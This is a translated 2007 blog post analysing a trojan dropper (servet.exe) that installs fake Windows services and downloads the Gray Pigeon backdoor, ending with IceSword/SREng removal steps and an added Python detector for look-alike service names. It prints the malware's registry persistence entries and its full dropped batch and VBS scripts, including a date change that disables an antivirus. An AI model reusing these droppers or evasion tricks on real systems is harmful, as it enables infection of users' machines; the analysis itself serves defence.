Removing servet.exe
2007-07-01 18:39:52
Copyright notice: original work; reposting is allowed, but when reposting you must credit the original source with a hyperlink, the author information and this notice, otherwise legal liability will be pursued. [url]http://gudugengkekao.51cto.com/172212/32592[/url]
The sample came from the Mumayi (木蚂蚁) community... the one with the slightly racy icon...

Actually I analysed it last week, but I was busy playing games and couldn't be bothered to write it up...

Dug it out today while tidying things up... heh...

Written in Delphi, wrapped in two layers of hard packers (HMYNIS and ASPACK); when I scanned it on VirusTotal last week it got past quite a few engines...
 
 
On execution it drops:

%Systemroot%\system32\servet.exe   29760 bytes

and registers it as a system service so that it starts at boot:
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
   79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,65,00,72,00,76,00,65,\
   00,74,00,2e,00,65,00,78,00,65,00,00,00
; the hex(2) (REG_EXPAND_SZ, UTF-16LE) bytes above decode to C:\winnt\system32\servet.exe
"DisplayName"="Windows InstallService"
"ObjectName"="LocalSystem"
"Description"="Windows InstallService"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\
   00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
   00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\
   05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\
   20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\
   00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\
   00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\
   00,01,01,00,00,00,00,00,05,12,00,00,00
 
It then uses Svchost to make a reverse connection and downloads two ***:

%Systemroot%\system\11.exe   652604 bytes, the Gray Pigeon (灰鸽子) from Heifang (黑防)...

%Systemroot%\system32\11.exe   719834 bytes, a little VB virus that seemingly doesn't even run... -_-

The VB virus drops:

%Systemroot%\system32\11.bat   568 bytes

with the contents:
 
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v lype /t REG_EXPAND_SZ /d "%systemroot%\avp.exe" /f
set date=%date%
date 2000-01-01
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > %system%.\run$.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo %system%.\ run$.vbs
goto Timeout
goto End
:Next
%systemroot%\system\11.exe
copy %systemroot%\system\run.pif   %systemroot%\system32\
for %%f in (%system%.\run$.vbs*) do del %%f
date %date%
RD /S /Q %systemroot%\system\
 
%Systemroot%\system\11.vbs   137 bytes

with the contents:
 
DIM objShell
set objShell=wscript.createObject("wscript.shell")
iReturn=objShell.Run("cmd.exe /C   %systemroot%\system\11.bat", 0, TRUE)
 
Basically birds of a feather... though I never saw it drop avp.exe or run$.vbs, or write the Run entry...

But it really did change the date to 2000-01-01 (note: that alone knocks out Kaspersky)...

And that 652604-byte Gray Pigeon, ugh, I had to run it by hand myself... (kill me...)

The Heifang Gray Pigeon is pretty decent: it's been made AV-evading and gets past Dr, BD, AVG, Ewido, McAfee, NOD32 and so on on VirusTotal...

It registers itself as a system service:
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss]
"Type"=dword:00000110
"Start"=dword:00000002
"ErrorControl"=dword:00000000
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
   79,00,73,00,74,00,65,00,6d,00,73,00,2e,00,65,00,78,00,65,00,00,00
; the hex(2) (REG_EXPAND_SZ, UTF-16LE) bytes above decode to C:\winnt\systems.exe
"DisplayName"="smss"
"ObjectName"="LocalSystem"
"Description"="系统关键进程"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss\Security]
"Security"=hex:01,00,14,80,a0,00,00,00,ac,00,00,00,14,00,00,00,30,00,00,00,02,\
   00,1c,00,01,00,00,00,02,80,14,00,ff,01,0f,00,01,01,00,00,00,00,00,01,00,00,\
   00,00,02,00,70,00,04,00,00,00,00,00,18,00,fd,01,02,00,01,01,00,00,00,00,00,\
   05,12,00,00,00,00,00,00,00,00,00,1c,00,ff,01,0f,00,01,02,00,00,00,00,00,05,\
   20,00,00,00,20,02,00,00,00,00,00,00,00,00,18,00,8d,01,02,00,01,01,00,00,00,\
   00,00,05,0b,00,00,00,20,02,00,00,00,00,1c,00,fd,01,02,00,01,02,00,00,00,00,\
   00,05,20,00,00,00,23,02,00,00,00,00,00,00,01,01,00,00,00,00,00,05,12,00,00,\
   00,01,01,00,00,00,00,00,05,12,00,00,00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss\Enum]
"0"="Root\\LEGACY_SMSS\\0000"
"Count"=dword:00000001
"NextInstance"=dword:00000001
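As an added example (not part of the original post), here is a Python script that parses the two service entries shown above out of a .reg export, decodes their hex(2) ImagePath values and flags the traits that give both of them away: a service name or image file name that mimics a core Windows process (smss, systems.exe ~ system, servet.exe ~ services), or an image path outside %SystemRoot%\system32. The embedded .reg text is a constructed sample built from the values in this post, and the 0.7 name-similarity cutoff is an assumption.

```python
import difflib, re

# Constructed sample: the two service keys from this post as a .reg export (ImagePath bytes copied, other values omitted).
SAMPLE_REG = r'''
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WindowsDown]
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,73,00,65,00,72,00,76,00,65,\
  00,74,00,2e,00,65,00,78,00,65,00,00,00
"DisplayName"="Windows InstallService"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\smss]
"ImagePath"=hex(2):43,00,3a,00,5c,00,77,00,69,00,6e,00,6e,00,74,00,5c,00,73,00,\
  79,00,73,00,74,00,65,00,6d,00,73,00,2e,00,65,00,78,00,65,00,00,00
'''
SERVICE_KEY = re.compile(r'^\[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\([^\\\]]+)\]$', re.I)
CORE_NAMES = ['smss', 'csrss', 'wininit', 'winlogon', 'lsass', 'services', 'svchost', 'system']

def decode_value(raw):
    # hex(2) is REG_EXPAND_SZ: NUL-terminated UTF-16LE text listed as hex bytes.
    if raw.startswith('hex(2):'):
        data = bytes(int(b, 16) for b in raw[7:].replace(' ', '').split(',') if b)
        return data.decode('utf-16-le').rstrip('\x00')
    return raw.strip('"')

def parse_services(reg_text):
    # Join backslash-continued lines, then collect values of each direct Services\<name> key (subkeys like Security/Enum skipped).
    services, current = {}, None
    for line in re.sub(r'\\\r?\n\s*', '', reg_text).splitlines():
        line = line.strip()
        if line.startswith('['):
            m = SERVICE_KEY.match(line)
            current = m.group(1) if m else None
            if current: services[current] = {}
            continue
        m = re.match(r'^"([^"]+)"=(.*)$', line)
        if m and current:
            services[current][m.group(1)] = decode_value(m.group(2))
    return services

def suspicious_services(services, cutoff=0.7):
    # Flag a service whose name or image file name is near-identical to a core process name, or whose image is outside system32.
    findings = {}
    for name, vals in services.items():
        path = vals.get('ImagePath', '').lower()
        reasons = []
        for cand in (name.lower(), path.rsplit('\\', 1)[-1].rsplit('.', 1)[0]):
            for hit in difflib.get_close_matches(cand, CORE_NAMES, 1, cutoff):
                reasons.append(f'{cand!r} mimics core process {hit!r}')
        if path and '\\system32\\' not in path:
            reasons.append(f'image outside system32: {path}')
        if reasons: findings[name] = reasons
    return findings
```

Run it against a real `reg export HKLM\SYSTEM\CurrentControlSet\Services` dump to list every service with either trait; the cutoff trades false positives for catching near-miss names like servet.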
 
and uses hooking to hide its process... haha... but SSM won't just "sit back and watch":

Then it makes a reverse connection (through the firewall); SSM caught it and I let it through...

Waited a while, nothing happened... ran out of patience (been irritable lately) and deleted it...

Removal:
 
 
Download IceSword (冰刃) and SREng

IceSword (enhanced edition) .rar, 555KB: [url]http://ys-C.ys168.com/?[/url]

Close unnecessary processes and disconnect from the network...
 
1. Open IceSword, kill the IE and CMD processes you see, plus systems.exe (the one under C:\Windows\), which is the Gray Pigeon. Because it is hidden by hooking, IS shows it in red; kill that too.

2. Use IceSword's "File" function to delete:
 
C:\Windows\system\11.exe
C:\Windows\system32\11.exe
C:\Windows\system\11.bat
C:\Windows\system\11.vbs
C:\Windows\system32\servet.exe
C:\Windows\systems.exe
 
3. Open SREng and delete:

Services
 
[Windows InstallService / WindowsDown][Stopped/Auto Start]
   <C:\winnt\system32\servet.exe><N/A>
 
[smss / smss][Running/Auto Start]
   <C:\winnt\systems.exe><N/A>
 
OK, then change your QQ, mail and other passwords, reboot, and done...
 